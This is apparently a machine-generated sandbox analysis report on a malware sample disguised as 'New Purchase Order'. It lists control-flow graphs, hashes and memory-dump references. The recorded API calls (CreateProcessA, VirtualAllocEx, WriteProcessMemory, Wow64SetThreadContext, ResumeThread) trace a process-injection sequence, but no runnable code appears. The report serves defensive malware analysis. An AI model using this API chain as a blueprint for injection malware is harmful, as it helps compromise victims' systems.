                • Graph data (basic block address ranges, called APIs and edges): 103 808c7c8-808c85d 105 808c85f-808c869 103->105 106 808c896-808c8b6 103->106 105->106 107 808c86b-808c86d 105->107 111 808c8b8-808c8c2 106->111 112 808c8ef-808c91e 106->112 108 808c86f-808c879 107->108 109 808c890-808c893 107->109 113 808c87b 108->113 114 808c87d-808c88c 108->114 109->106 111->112 115 808c8c4-808c8c6 111->115 122 808c920-808c92a 112->122 123 808c957-808ca11 CreateProcessA 112->123 113->114 114->114 116 808c88e 114->116 117 808c8c8-808c8d2 115->117 118 808c8e9-808c8ec 115->118 116->109 120 808c8d4 117->120 121 808c8d6-808c8e5 117->121 118->112 120->121 121->121 124 808c8e7 121->124 122->123 125 808c92c-808c92e 122->125 134 808ca1a-808caa0 123->134 135 808ca13-808ca19 123->135 124->118 127 808c930-808c93a 125->127 128 808c951-808c954 125->128 129 808c93c 127->129 130 808c93e-808c94d 127->130 128->123 129->130 130->130 132 808c94f 130->132 132->128 145 808cab0-808cab4 134->145 146 808caa2-808caa6 134->146 135->134 148 808cac4-808cac8 145->148 149 808cab6-808caba 145->149 146->145 147 808caa8 146->147 147->145 151 808cad8-808cadc 148->151 152 808caca-808cace 148->152 149->148 150 808cabc 149->150 150->148 154 808caee-808caf5 151->154 155 808cade-808cae4 151->155 152->151 153 808cad0 152->153 153->151 156 808cb0c 154->156 157 808caf7-808cb06 154->157 155->154 159 808cb0d 156->159 157->156 159->159
                APIs
                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0808C9FE
                Memory Dump Source
                • Source File: 00000000.00000002.2170482675.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8080000_New Purchase Order.jbxd
                Similarity
                • API ID: CreateProcess
                • String ID:
                • API String ID: 963392458-0
                • Opcode ID: 97a122580fc34411e8db9529b4095e913d7197f6b5bdd7e75cf20631373545f4
                • Instruction ID: 5cdea19fd17d6eefa69083df42b3c24c972807448b639fa331b70f9a744764dc
                • Opcode Fuzzy Hash: 97a122580fc34411e8db9529b4095e913d7197f6b5bdd7e75cf20631373545f4
                • Instruction Fuzzy Hash: A6915A71D00219DFEF90DF68C8417AEBBF2BF48315F1485A9E849A7240DB749985CFA1

                Control-flow Graph
                • Graph data (basic block address ranges, calls, called APIs and edges): 160 2cfb299-2cfb2b7 161 2cfb2b9-2cfb2c6 call 2cfaf38 160->161 162 2cfb2e3-2cfb2e7 160->162 168 2cfb2dc 161->168 169 2cfb2c8 161->169 164 2cfb2fb-2cfb33c 162->164 165 2cfb2e9-2cfb2f3 162->165 171 2cfb33e-2cfb346 164->171 172 2cfb349-2cfb357 164->172 165->164 168->162 217 2cfb2ce call 2cfb533 169->217 218 2cfb2ce call 2cfb540 169->218 171->172 173 2cfb37b-2cfb37d 172->173 174 2cfb359-2cfb35e 172->174 179 2cfb380-2cfb387 173->179 176 2cfb369 174->176 177 2cfb360-2cfb367 call 2cfaf44 174->177 175 2cfb2d4-2cfb2d6 175->168 178 2cfb418-2cfb496 175->178 181 2cfb36b-2cfb379 176->181 177->181 210 2cfb49a-2cfb4d8 178->210 211 2cfb498-2cfb499 178->211 182 2cfb389-2cfb391 179->182 183 2cfb394-2cfb39b 179->183 181->179 182->183 186 2cfb39d-2cfb3a5 183->186 187 2cfb3a8-2cfb3b1 call 2cfaf54 183->187 186->187 191 2cfb3be-2cfb3c3 187->191 192 2cfb3b3-2cfb3bb 187->192 193 2cfb3c5-2cfb3cc 191->193 194 2cfb3e1-2cfb3ee 191->194 192->191 193->194 196 2cfb3ce-2cfb3de call 2cfaf64 call 2cfaf74 193->196 201 2cfb411-2cfb417 194->201 202 2cfb3f0-2cfb40e 194->202 196->194 202->201 212 2cfb4da-2cfb4dd 210->212 213 2cfb4e0-2cfb50b GetModuleHandleW 210->213 211->210 212->213 214 2cfb50d-2cfb513 213->214 215 2cfb514-2cfb528 213->215 214->215 217->175 218->175
                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 02CFB4FE
                Memory Dump Source
                • Source File: 00000000.00000002.2162909541.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2cf0000_New Purchase Order.jbxd
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: 972404a5dd1a41b6e17a4a34e2484b62fe1225b1e8fa74c678aba04049c697f6
                • Instruction ID: b817201371103301b76ee4ff672615a665a7582196ef6e566d1b5d0125c5a5a3
                • Opcode Fuzzy Hash: 972404a5dd1a41b6e17a4a34e2484b62fe1225b1e8fa74c678aba04049c697f6
                • Instruction Fuzzy Hash: 73812570A00B058FD7A4DF2AD44475ABBF1FF88308F008A2DE54AD7A50DB75E949CB90

                Control-flow Graph
                • Graph data (basic block address ranges, called APIs and edges): 219 2cf590c-2cf5916 220 2cf5918-2cf59d9 CreateActCtxA 219->220 222 2cf59db-2cf59e1 220->222 223 2cf59e2-2cf5a3c 220->223 222->223 230 2cf5a3e-2cf5a41 223->230 231 2cf5a4b-2cf5a4f 223->231 230->231 232 2cf5a51-2cf5a5d 231->232 233 2cf5a60-2cf5a90 231->233 232->233 237 2cf5a42-2cf5a44 233->237 238 2cf5a92-2cf5b14 233->238 237->231
                APIs
                • CreateActCtxA.KERNEL32(?), ref: 02CF59C9
                Memory Dump Source
                • Source File: 00000000.00000002.2162909541.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2cf0000_New Purchase Order.jbxd
                Similarity
                • API ID: Create
                • String ID:
                • API String ID: 2289755597-0
                • Opcode ID: 86ef91cf994de33224081b27c82e55ddda8056772f44cb87bcf0d075cfc9fccd
                • Instruction ID: f079bb22bad2509110679cf44a30838587584a253a0417d316cef10a9d2fbe90
                • Opcode Fuzzy Hash: 86ef91cf994de33224081b27c82e55ddda8056772f44cb87bcf0d075cfc9fccd
                • Instruction Fuzzy Hash: 6A410370C0071DCBEB64CFA9C98479EBBB5BF89714F608069D508AB251DB716949CF90

                Control-flow Graph
                • Graph data (basic block address ranges, called APIs and edges): 240 2cf44e0-2cf59d9 CreateActCtxA 243 2cf59db-2cf59e1 240->243 244 2cf59e2-2cf5a3c 240->244 243->244 251 2cf5a3e-2cf5a41 244->251 252 2cf5a4b-2cf5a4f 244->252 251->252 253 2cf5a51-2cf5a5d 252->253 254 2cf5a60-2cf5a90 252->254 253->254 258 2cf5a42-2cf5a44 254->258 259 2cf5a92-2cf5b14 254->259 258->252
                APIs
                • CreateActCtxA.KERNEL32(?), ref: 02CF59C9
                Memory Dump Source
                • Source File: 00000000.00000002.2162909541.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2cf0000_New Purchase Order.jbxd
                Similarity
                • API ID: Create
                • String ID:
                • API String ID: 2289755597-0
                • Opcode ID: 8a5bb5a3c9f6fa55a17ef775526eb89c043d77fb839be5e96cfaab19bf920262
                • Instruction ID: 5be341e8a6f72f232b0506166771561e575fef00928c2f2de69251b48c9dbe16
                • Opcode Fuzzy Hash: 8a5bb5a3c9f6fa55a17ef775526eb89c043d77fb839be5e96cfaab19bf920262
                • Instruction Fuzzy Hash: 6441F270C0071DCBEF64CFA9C98479EBBB5BF88704F60806AD509AB251DB716949CF90

                Control-flow Graph
                • Graph data (basic block address ranges, called APIs and edges): 261 808c539-808c58e 263 808c59e-808c5dd WriteProcessMemory 261->263 264 808c590-808c59c 261->264 266 808c5df-808c5e5 263->266 267 808c5e6-808c616 263->267 264->263 266->267
                APIs
                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0808C5D0
                Memory Dump Source
                • Source File: 00000000.00000002.2170482675.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8080000_New Purchase Order.jbxd
                Similarity
                • API ID: MemoryProcessWrite
                • String ID:
                • API String ID: 3559483778-0
                • Opcode ID: 9cdd1b194cc4128ba0b7bc796b6860d36667af99e9fa12b8dec528d34a92a5a8
                • Instruction ID: b57beca36386331fbdc0c4930ab8b717999daa5faf1594c1b8949f4542f60777
                • Opcode Fuzzy Hash: 9cdd1b194cc4128ba0b7bc796b6860d36667af99e9fa12b8dec528d34a92a5a8
                • Instruction Fuzzy Hash: 97210476900349DFDF50DFA9C881BDEBBF1BF48320F10842AE959A7240C7789A55CBA5

                Control-flow Graph
                • Graph data (basic block address ranges, called APIs and edges): 271 808bf68-808bfbb 274 808bfcb-808bffb Wow64SetThreadContext 271->274 275 808bfbd-808bfc9 271->275 277 808bffd-808c003 274->277 278 808c004-808c034 274->278 275->274 277->278
                APIs
                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0808BFEE
                Memory Dump Source
                • Source File: 00000000.00000002.2170482675.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8080000_New Purchase Order.jbxd
                Similarity
                • API ID: ContextThreadWow64
                • String ID:
                • API String ID: 983334009-0
                • Opcode ID: 9977cc4b4b3b55d71c5b4224a824696fbbe371e693becacd218f8f9de70e120f
                • Instruction ID: a4b4c4caa84c89564f577243dafc1dfd8b5c6b2d5ec58c7de85444f21a079918
                • Opcode Fuzzy Hash: 9977cc4b4b3b55d71c5b4224a824696fbbe371e693becacd218f8f9de70e120f
                • Instruction Fuzzy Hash: 4E2159719003099FDB20DFAAC4817EEBBF5EF48324F108429D559A7241CB78A585CFA5

                Control-flow Graph
                • Graph data (basic block address ranges, called APIs and edges): 282 808c540-808c58e 284 808c59e-808c5dd WriteProcessMemory 282->284 285 808c590-808c59c 282->285 287 808c5df-808c5e5 284->287 288 808c5e6-808c616 284->288 285->284 287->288
                APIs
                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0808C5D0
                Memory Dump Source
                • Source File: 00000000.00000002.2170482675.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8080000_New Purchase Order.jbxd
                Similarity
                • API ID: MemoryProcessWrite
                • String ID:
                • API String ID: 3559483778-0
                • Opcode ID: 8e0d4af78c38a93ff93758bce42e2e1ec907adb3612cd9145bbb0cbe8cdafe65
                • Instruction ID: 9de831d16040976cc46a5100b552db0e814fb2f5af16852591a5777b84ed95af
                • Opcode Fuzzy Hash: 8e0d4af78c38a93ff93758bce42e2e1ec907adb3612cd9145bbb0cbe8cdafe65
                • Instruction Fuzzy Hash: D9210471900349DFDF50DFA9C881BDEBBF5BF48310F108429E959A7240C778A954CBA4

                Control-flow Graph
                • Graph data (basic block address ranges, called APIs and edges): 292 808c628-808c6bd ReadProcessMemory 296 808c6bf-808c6c5 292->296 297 808c6c6-808c6f6 292->297 296->297
                APIs
                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0808C6B0
                Memory Dump Source
                • Source File: 00000000.00000002.2170482675.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8080000_New Purchase Order.jbxd
                Similarity
                • API ID: MemoryProcessRead
                • String ID:
                • API String ID: 1726664587-0
                • Opcode ID: ab020e9b65dac78a9a0ae42aa3500b52c6ed020085d37a4695a5f017f40f3e44
                • Instruction ID: 05b838a9e35fe21df123511ff119e59de0704624b9bc1c8a298a5b9a3b13e7ed
                • Opcode Fuzzy Hash: ab020e9b65dac78a9a0ae42aa3500b52c6ed020085d37a4695a5f017f40f3e44
                • Instruction Fuzzy Hash: 5E2127718013499FDB10DFAAC881BEEBBF5FF48320F10842AE559A7250D774A950CBA5

                Control-flow Graph
                • Graph data (basic block address ranges, called APIs and edges): 301 2cfd780-2cfd786 302 2cfd788-2cfd81c DuplicateHandle 301->302 303 2cfd81e-2cfd824 302->303 304 2cfd825-2cfd842 302->304 303->304
                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02CFD80F
                Memory Dump Source
                • Source File: 00000000.00000002.2162909541.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2cf0000_New Purchase Order.jbxd
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: 605f8115ce532b064e207878640a50fb1d38986cd90ae3bede65b7d2915259c0
                • Instruction ID: 13c7ed47c3b22aba83a1d27a974655561ce7aa15d0880cc2beed61918e44bb59
                • Opcode Fuzzy Hash: 605f8115ce532b064e207878640a50fb1d38986cd90ae3bede65b7d2915259c0
                • Instruction Fuzzy Hash: F421F4B5900248DFDB50CFAAD984ADEBFF4FB48720F14801AE915A3210D374A950CFA5

                Control-flow Graph
                • Graph data (basic block address ranges, called APIs and edges): 307 808bf70-808bfbb 309 808bfcb-808bffb Wow64SetThreadContext 307->309 310 808bfbd-808bfc9 307->310 312 808bffd-808c003 309->312 313 808c004-808c034 309->313 310->309 312->313
                APIs
                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0808BFEE
                Memory Dump Source
                • Source File: 00000000.00000002.2170482675.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8080000_New Purchase Order.jbxd
                Similarity
                • API ID: ContextThreadWow64
                • String ID:
                • API String ID: 983334009-0
                • Opcode ID: d1007235e9bbf31cb9e619b9a019b97dc4533ef7059ac21778a864fa883a34b2
                • Instruction ID: e56cc4366dcadf2c4bd63dca3c6c806d0390f6886c14c1d4aebab2225a7d64ae
                • Opcode Fuzzy Hash: d1007235e9bbf31cb9e619b9a019b97dc4533ef7059ac21778a864fa883a34b2
                • Instruction Fuzzy Hash: 1E2138719003098FDB50DFAAC4857AEBBF5EF88324F148429D559A7241CB78A944CFA5

                Control-flow Graph
                • Graph data (basic block address ranges, called APIs and edges): 317 808c630-808c6bd ReadProcessMemory 320 808c6bf-808c6c5 317->320 321 808c6c6-808c6f6 317->321 320->321
                APIs
                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0808C6B0
                Memory Dump Source
                • Source File: 00000000.00000002.2170482675.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8080000_New Purchase Order.jbxd
                Similarity
                • API ID: MemoryProcessRead
                • String ID:
                • API String ID: 1726664587-0
                • Opcode ID: 0705e5e80031d5c5448ff2cdc1156cf19bd329a82be6c50b6f4872652e3a96c1
                • Instruction ID: ef5d8be316d935edf40389158208d0fc2a9b2d6069cb4c38e3812ad308e43820
                • Opcode Fuzzy Hash: 0705e5e80031d5c5448ff2cdc1156cf19bd329a82be6c50b6f4872652e3a96c1
                • Instruction Fuzzy Hash: B32116718003499FDB10DFAAC881BDEBBF5FF48320F10842AE559A7250C7789950CBA5

                Control-flow Graph
                • Graph data (basic block address ranges, called APIs and edges): 325 2cfd788-2cfd81c DuplicateHandle 326 2cfd81e-2cfd824 325->326 327 2cfd825-2cfd842 325->327 326->327
                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02CFD80F
                Memory Dump Source
                • Source File: 00000000.00000002.2162909541.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2cf0000_New Purchase Order.jbxd
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: d7ba2f938ac1b67b0a5b4b064e727d74583a2ccf5b02a4ba0752597dab9755fd
                • Instruction ID: 9179608ad432e8980f1247d179a6ef53b5dd8574fe733877e0627ecf44dcf7ff
                • Opcode Fuzzy Hash: d7ba2f938ac1b67b0a5b4b064e727d74583a2ccf5b02a4ba0752597dab9755fd
                • Instruction Fuzzy Hash: ED21E3B59002499FDB50CF9AD984ADEBBF4FB48320F14841AE915A3210D374A954CFA4
                APIs
                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0808C4EE
                Memory Dump Source
                • Source File: 00000000.00000002.2170482675.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8080000_New Purchase Order.jbxd
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: f9973594ec4a0da60c1a3a0e50304589b4fd53444814a1f3b71cfcbd2b5112de
                • Instruction ID: 36ba4daa10d670d34d0895fe92572bd8d070d02b2f3b8836d795e3ff814be7bd
                • Opcode Fuzzy Hash: f9973594ec4a0da60c1a3a0e50304589b4fd53444814a1f3b71cfcbd2b5112de
                • Instruction Fuzzy Hash: EB1164728002499FDF10DFAAC841BEFBBF5EF88320F10841AE519A7210CB75A590CFA1
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2170482675.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8080000_New Purchase Order.jbxd
                Similarity
                • API ID: ResumeThread
                • String ID:
                • API String ID: 947044025-0
                • Opcode ID: 1f2dd2494b7086210ce9b92b6037092dc237b069427003e78e2e5610dbbf1f0f
                • Instruction ID: a4d55000edbae4beb711547b88d6e886465c871555e089eb3d8e187802d375b7
                • Opcode Fuzzy Hash: 1f2dd2494b7086210ce9b92b6037092dc237b069427003e78e2e5610dbbf1f0f
                • Instruction Fuzzy Hash: 8A1146B59013498FDB20DFAAC4457EEFBF5EF88324F208819D559A7240CBB9A540CFA5
                APIs
                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0808C4EE
                Memory Dump Source
                • Source File: 00000000.00000002.2170482675.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8080000_New Purchase Order.jbxd
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: 4cfb3b845c1724ff46841a9f9eac77a0656fb215b7bb01cfa2e4e50ab98e4c1e
                • Instruction ID: 3a63f23499a023e053c3a359f0001f67916c712b612a87f131e03665f27f5b4e
                • Opcode Fuzzy Hash: 4cfb3b845c1724ff46841a9f9eac77a0656fb215b7bb01cfa2e4e50ab98e4c1e
                • Instruction Fuzzy Hash: 72115672800249DFDF10DFAAC844BDFBBF5EF88320F108419E519A7250CB75A550CBA4
                APIs
                • PostMessageW.USER32(?,?,?,?), ref: 074D11AD
                Memory Dump Source
                • Source File: 00000000.00000002.2169997628.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_74d0000_New Purchase Order.jbxd
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: ec044823261c9f1008f868c30e9fce62732cc11193ddd3d23d09af2f933f52db
                • Instruction ID: 96ecc40ac3a6acd111d225b0b2e9bb0aae71a9d602275e96d21abe48f4637ec0
                • Opcode Fuzzy Hash: ec044823261c9f1008f868c30e9fce62732cc11193ddd3d23d09af2f933f52db
                • Instruction Fuzzy Hash: AA11F5B58003499FDB10DF99D985BEFFBF8EB48320F10841AE958A7210D375A994CFA5
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2170482675.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8080000_New Purchase Order.jbxd
                Similarity
                • API ID: ResumeThread
                • String ID:
                • API String ID: 947044025-0
                • Opcode ID: a8d58fc5ce0d9d74a08d7381ec659499da968b3ece0338368fdc035a866c87be
                • Instruction ID: 70ce2e090ea59105a1f307475c8d09057c40981aa550101299e5b78dde75e534
                • Opcode Fuzzy Hash: a8d58fc5ce0d9d74a08d7381ec659499da968b3ece0338368fdc035a866c87be
                • Instruction Fuzzy Hash: D51125B19003498FDB20DFAAC4457AEFBF5AF88624F248419D559A7240CBB9A940CFA5
                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 02CFB4FE
                Memory Dump Source
                • Source File: 00000000.00000002.2162909541.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2cf0000_New Purchase Order.jbxd
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: cc10220d235a9c0290c753c46d2e3d1c0b3277213798311adc64bee0be3c8e32
                • Instruction ID: 2707bfd5e293d7ba605a449e733a3cef2dcc387610e5737ba599c65635bdafc7
                • Opcode Fuzzy Hash: cc10220d235a9c0290c753c46d2e3d1c0b3277213798311adc64bee0be3c8e32
                • Instruction Fuzzy Hash: AB1102B5C002498FCB50CF9AC544BDEFBF4AB88328F10841AD519A7210D379A545CFA5
                APIs
                • PostMessageW.USER32(?,?,?,?), ref: 074D11AD
                Memory Dump Source
                • Source File: 00000000.00000002.2169997628.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_74d0000_New Purchase Order.jbxd
                Similarity
                • API ID: MessagePost
                • String ID:
                • API String ID: 410705778-0
                • Opcode ID: 252d9f507a9f5b36410bb9e662590d8b70b7c5b890d7d88fb9574ac20a09a546
                • Instruction ID: 5165aef54a3d2ef863b6d409fa7673678a1161167607463f4911e60324c5c4c8
                • Opcode Fuzzy Hash: 252d9f507a9f5b36410bb9e662590d8b70b7c5b890d7d88fb9574ac20a09a546
                • Instruction Fuzzy Hash: 5311D3B58003499FDB10DF9AD985BDEFBF8EB48320F10841AD958A7210C3B5A954CFA5
                Memory Dump Source
                • Source File: 00000000.00000002.2162134526.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_130d000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d1bc6e2dab3e5d67ece6a28f788284f8b4a298ecb1ddeea2d24536925260fd74
                • Instruction ID: 28f503d3474ee66e2a06bff7bbfc78afec5c9a0fb5b1e95b6de8e4a745e04b67
                • Opcode Fuzzy Hash: d1bc6e2dab3e5d67ece6a28f788284f8b4a298ecb1ddeea2d24536925260fd74
                • Instruction Fuzzy Hash: EB21F772504244DFDB06DF94D9D0B26BFE9FB84328F208569E9050A296C376D416CB61
                Memory Dump Source
                • Source File: 00000000.00000002.2162134526.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_130d000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 51341f02d9a5ef541ebd45b762e8e166834c1f266f57049cc533cef4f6dd024d
                • Instruction ID: ece64bbdece46e1803ad351235dfa639d3367396b7ffbda4d17a16bed33fe32b
                • Opcode Fuzzy Hash: 51341f02d9a5ef541ebd45b762e8e166834c1f266f57049cc533cef4f6dd024d
                • Instruction Fuzzy Hash: 5D210372504244EFDB06DF98D9D0B26BFE5FB8831CF20C569ED090B696C336D456CAA1
                Memory Dump Source
                • Source File: 00000000.00000002.2162244026.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_131d000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b10aa66ac9a66a195026744ab78b766ecc735fa7d7c90c3e8a96a75688920e72
                • Instruction ID: 624d9b2a76cd5c09a77560f283ac290cc36dbf2914d8bcf0f3b30153c191390e
                • Opcode Fuzzy Hash: b10aa66ac9a66a195026744ab78b766ecc735fa7d7c90c3e8a96a75688920e72
                • Instruction Fuzzy Hash: 4F214671504304EFDB09DF94D9C8B66BBA5FB89328F20C66DE9094B25AC37AD407CA61
                Memory Dump Source
                • Source File: 00000000.00000002.2162244026.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_131d000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f3ace419dac924778cba0747cb7f5ca89f1adf29dcc16d73d5bb315283fd02c2
                • Instruction ID: d41dc04530d4c1df857aeb6bb8a6e7528e79bab3b219f356aad10c1f28b73dca
                • Opcode Fuzzy Hash: f3ace419dac924778cba0747cb7f5ca89f1adf29dcc16d73d5bb315283fd02c2
                • Instruction Fuzzy Hash: FA214275604204EFCB18DF58D9C8B26BB65FB85318F20C56DD90A0B25AC33AD407CA61
                Memory Dump Source
                • Source File: 00000000.00000002.2162134526.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_130d000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 45d2786e60e1e4201bb004dcd9f59ae96814e242b2a6b2dda49e09682ea99c03
                • Instruction ID: 7fab6eb774afc9677f9be3630eb0315380cb816680a0abebbf77d6db6a872202
                • Opcode Fuzzy Hash: 45d2786e60e1e4201bb004dcd9f59ae96814e242b2a6b2dda49e09682ea99c03
                • Instruction Fuzzy Hash: B221DF76404280CFCB06CF84D9C4B16BFB2FB84324F24C1A9DC080B296C33AD426CBA1
                Memory Dump Source
                • Source File: 00000000.00000002.2162134526.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_130d000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                • Instruction ID: e1fb4bd84ba45b8ab33a5fcfed0f29ea18d0e68a160812f16448bed1ade22cd7
                • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                • Instruction Fuzzy Hash: C711AF76504284CFCB16CF54D5C4B16BFB1FB88318F24C6A9DC490B696C33AD45ACBA1
                Memory Dump Source
                • Source File: 00000000.00000002.2162244026.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_131d000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                • Instruction ID: 7ba5fc137199e0882bf67474512839df972e5d836ade73388e2eddf3193b6a63
                • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                • Instruction Fuzzy Hash: 1111D075504280CFCB16CF54D5C4B15FF61FB45318F24C6A9D8094B65AC33BD44ACB62
                Memory Dump Source
                • Source File: 00000000.00000002.2162244026.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_131d000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                • Instruction ID: f741481941c6d667868f6e08294c482d49779ae9731e9a56ae6337f17df40b2d
                • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                • Instruction Fuzzy Hash: 3011BB75504280DFCB06CF54C5C4B55BBB1FB85228F24C6A9D8494B6AAC33AD40ACB61
                Memory Dump Source
                • Source File: 00000000.00000002.2170482675.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8080000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 02a7830a359cc05b5c773806eed00866a3cc6141c9f71068e45e87051fefae5c
                • Instruction ID: ca897d0b1e61e8a95443c1274a8dd5fd70a5fc883887db641565f774e191b152
                • Opcode Fuzzy Hash: 02a7830a359cc05b5c773806eed00866a3cc6141c9f71068e45e87051fefae5c
                • Instruction Fuzzy Hash: E8E1FA74E00259CFDB14EF99C580AAEBBF2BF49305F248269D454A7356D730A982CF60
                Memory Dump Source
                • Source File: 00000000.00000002.2170482675.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8080000_New Purchase Order.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                Memory Dump Source
